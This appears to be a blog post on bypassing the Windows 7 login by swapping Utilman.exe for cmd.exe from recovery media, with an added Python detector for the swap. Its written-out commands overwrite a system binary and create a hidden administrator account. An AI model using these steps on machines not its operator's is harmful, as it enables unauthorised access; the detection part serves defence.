Bypassing Windows 7 Login Using Ease Of Access Menu

I am almost certain that this has been covered elsewhere. If you have seen this before, then I am sorry I wasted a precious few minutes of your life.

Recently I came back to work on a PoC that I had started many months ago. So long ago, in fact, that I had completely forgotten the local admin password for the Windows 7 box I was testing on. Using the following technique I was able to create a new admin account and log in!

  1. Boot up using a Windows 7 installation CD.
  2. At the first splash screen click “Repair your computer”.
  3. Select “Use recovery tools that can help fix problems…” and click Next.
  4. Click “Command Prompt”.
  5. Type in the following commands (the recovery environment mounted the installed Windows volume as D: here; confirm with dir D:\ before proceeding):

    rem "cd D:" on its own only prints the current directory of D:, so switch drives first
    D:
    cd \Windows\System32
    rem keep a copy of the real Ease of Access helper so it can be restored later
    copy Utilman.exe utilman.bak
    rem overwrite the helper with the command prompt (answer Yes at the overwrite prompt)
    copy cmd.exe Utilman.exe

So what did we just do here? The first two commands changed our current working directory to D:\Windows\System32. This location contains both cmd.exe (the command prompt) and Utilman.exe (the Ease of Access helper launched from the login screen). Once we had changed directories we made a backup of Utilman.exe named utilman.bak, as we don’t want to permanently destroy the file. We then copied cmd.exe over Utilman.exe, overwriting the helper so that anything which launches Utilman.exe now gets a command prompt instead.

  6. Reboot the system and remove the installation media.

  7. At the login screen click the Ease of Access button in the bottom left-hand corner. This should launch a command prompt.

  8. Run the following commands:

    net user cracked Changeme! /add
    net localgroup administrators cracked /add

The first command creates a new user named cracked with the password Changeme!. The second command adds the new user to the local administrators group.

  9. Close the command prompt.

  10. Log in using your new credentials.
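The swap above is easy to spot after the fact. Here is a defender-side check, added as an example and not part of the original post: it hashes the accessibility helpers in System32 and flags any that is byte-identical to cmd.exe or powershell.exe, or that has a leftover backup such as utilman.bak beside it. The list of helper binaries, the backup suffixes and the sample files are assumptions of this example.

```python
import hashlib
import tempfile
from pathlib import Path

# Accessibility helpers winlogon can launch from the logon screen. The list is an
# assumption of this example; the post itself only mentions Utilman.exe.
ACCESSIBILITY_BINARIES = ("utilman.exe", "sethc.exe", "osk.exe",
                          "narrator.exe", "magnify.exe", "displayswitch.exe")
# Shells whose bytes would show up under an accessibility name after a swap.
SHELL_BINARIES = ("cmd.exe", "powershell.exe")
BACKUP_SUFFIXES = (".bak", ".old", ".orig")


def sha256_of(path: Path) -> str:
    # Hash in 1 MiB chunks so large binaries are not read into memory at once.
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_accessibility_binaries(system32) -> list[str]:
    """Flag helpers byte-identical to a shell, plus stray backups beside them."""
    system32 = Path(system32)  # live System32 or the same directory in a mounted image
    shell_by_hash = {sha256_of(system32 / name): name
                     for name in SHELL_BINARIES if (system32 / name).is_file()}
    findings = []
    for name in ACCESSIBILITY_BINARIES:
        target = system32 / name
        if target.is_file():
            shell = shell_by_hash.get(sha256_of(target))
            if shell:
                findings.append(f"{name} is byte-identical to {shell}")
        for suffix in BACKUP_SUFFIXES:  # e.g. the utilman.bak left behind in the post
            backup = target.stem + suffix
            if (system32 / backup).is_file():
                findings.append(f"stray backup {backup} next to {name}")
    return findings


def run_demo() -> list[str]:
    """Run the check against a constructed System32 (placeholder bytes, not real binaries)."""
    with tempfile.TemporaryDirectory() as tmp:
        s32 = Path(tmp) / "Windows" / "System32"
        s32.mkdir(parents=True)
        cmd_bytes = b"MZ constructed stand-in for cmd.exe"
        (s32 / "cmd.exe").write_bytes(cmd_bytes)
        (s32 / "utilman.exe").write_bytes(cmd_bytes)                 # swapped, as in the post
        (s32 / "utilman.bak").write_bytes(b"MZ constructed utilman")  # leftover backup
        (s32 / "sethc.exe").write_bytes(b"MZ constructed sethc")      # untouched helper
        return check_accessibility_binaries(s32)
```

Because the copy in step 5 happens with the OS offline, full-disk encryption such as BitLocker is what prevents the swap in the first place; this check only finds it afterwards.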

2 Responses

  1. Inder Mohan says:

    Reblogged this on Inder Mohan and commented:
    Bypassing Windows 7 Login